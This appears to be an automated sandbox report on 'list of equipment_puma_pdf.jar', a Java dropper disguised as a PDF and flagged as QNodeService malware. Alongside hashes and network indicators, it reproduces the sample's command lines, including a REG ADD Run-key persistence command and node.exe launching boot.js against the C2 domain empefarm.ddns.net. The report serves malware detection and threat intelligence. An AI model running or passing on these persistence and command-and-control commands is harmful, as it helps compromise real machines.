Analysis Overview
SHA256
0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6
Threat Level: Known bad
The file "list of equipment_puma_pdf.jar" was found to be: Known bad.
Malicious Activity Summary
QNodeService
Executes dropped EXE
Adds Run key to start application
JavaScript code in executable
Looks up external IP address via web service
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
| Reported | 2020-10-05 13:14 |
Signatures
Analysis: behavioral1
Detonation Overview
| Submitted | 2020-10-05 13:14 |
| Reported | 2020-10-05 13:16 |
| Platform | win7 |
| Max time kernel | 3s |
| Max time network | 16s |
Command Line
Signatures
Processes
C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"
Network
Files
Analysis: behavioral2
Detonation Overview
| Submitted | 2020-10-05 13:14 |
| Reported | 2020-10-05 13:16 |
| Platform | win10v200722 |
| Max time kernel | 128s |
| Max time network | 132s |
Command Line
Signatures
QNodeService
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| N/A | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\8aa35a81-23a1-45e0-be91-c4ef6db99f6f = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | C:\Windows\system32\reg.exe | N/A |
JavaScript code in executable
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | wtfismyip.com | N/A | N/A |
| N/A | wtfismyip.com | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\list of equipment_puma_pdf.jar"
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js --hub-domain empefarm.ddns.net
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
C:\Windows\system32\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "8aa35a81-23a1-45e0-be91-c4ef6db99f6f" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 8.8.8.8:53 | nodejs.org | udp |
| N/A | 104.20.23.46:443 | nodejs.org | tcp |
| N/A | 8.8.8.8:53 | empefarm.ddns.net | udp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 185.245.84.137:443 | empefarm.ddns.net | tcp |
| N/A | 8.8.8.8:53 | wtfismyip.com | udp |
| N/A | 95.217.228.176:443 | wtfismyip.com | tcp |
Files
memory/3516-51-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\3356b8c6.tmp
| MD5 | 9d5548aa1a52a4fd8cc9ad1c64a23a09 |
| SHA1 | 72474bd84027c0aa72b09c3f48e1c57ecf935bb2 |
| SHA256 | 0d7b48039793c6f044e4d7b6f42898adbe1e9d722ec37a12c7073cdfffa63db6 |
| SHA512 | c73296d0b6cd972a90eef0e7a4c32874cf190cf2d545f2f1338ce2d3bf7dfc784a46bf514be6b7d2ebb92124e610c86667a53f7d3ebe5c31a5791a6ef8e90eb6 |
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/3580-161-0x0000000000000000-mapping.dmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
| MD5 | f0b11a5823c45fc2664e116dc0323bcb |
| SHA1 | 612339040c1f927ec62186cd5012f4bb9c53c1b9 |
| SHA256 | 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99 |
| SHA512 | 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac |
memory/3580-163-0x000000AF59080000-0x000000AF59081000-memory.dmp
memory/788-164-0x0000000000000000-mapping.dmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
| MD5 | f0b11a5823c45fc2664e116dc0323bcb |
| SHA1 | 612339040c1f927ec62186cd5012f4bb9c53c1b9 |
| SHA256 | 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99 |
| SHA512 | 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac |
memory/788-166-0x0000001D75AC0000-0x0000001D75AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_qhub_node_kqDsWh\boot.js
| MD5 | c686d5fcf94d07f7cee70109eba9c4d3 |
| SHA1 | 588eee04fdbf1fa372c8389c66d581e0b37afd7e |
| SHA256 | e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d |
| SHA512 | 5af3b52daafe41bf891dcd846c3b8c15c04d1da2cdb28c915cf970f2fbe3d7bba6b6fc7c291a431a2d0a437f159322401eb8aa567a146763d665ca76677853a3 |
memory/3184-168-0x0000000000000000-mapping.dmp
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
| MD5 | f0b11a5823c45fc2664e116dc0323bcb |
| SHA1 | 612339040c1f927ec62186cd5012f4bb9c53c1b9 |
| SHA256 | 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99 |
| SHA512 | 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac |
memory/3184-170-0x000000A1111C0000-0x000000A1111C1000-memory.dmp
memory/2180-171-0x0000000000000000-mapping.dmp
memory/1648-172-0x0000000000000000-mapping.dmp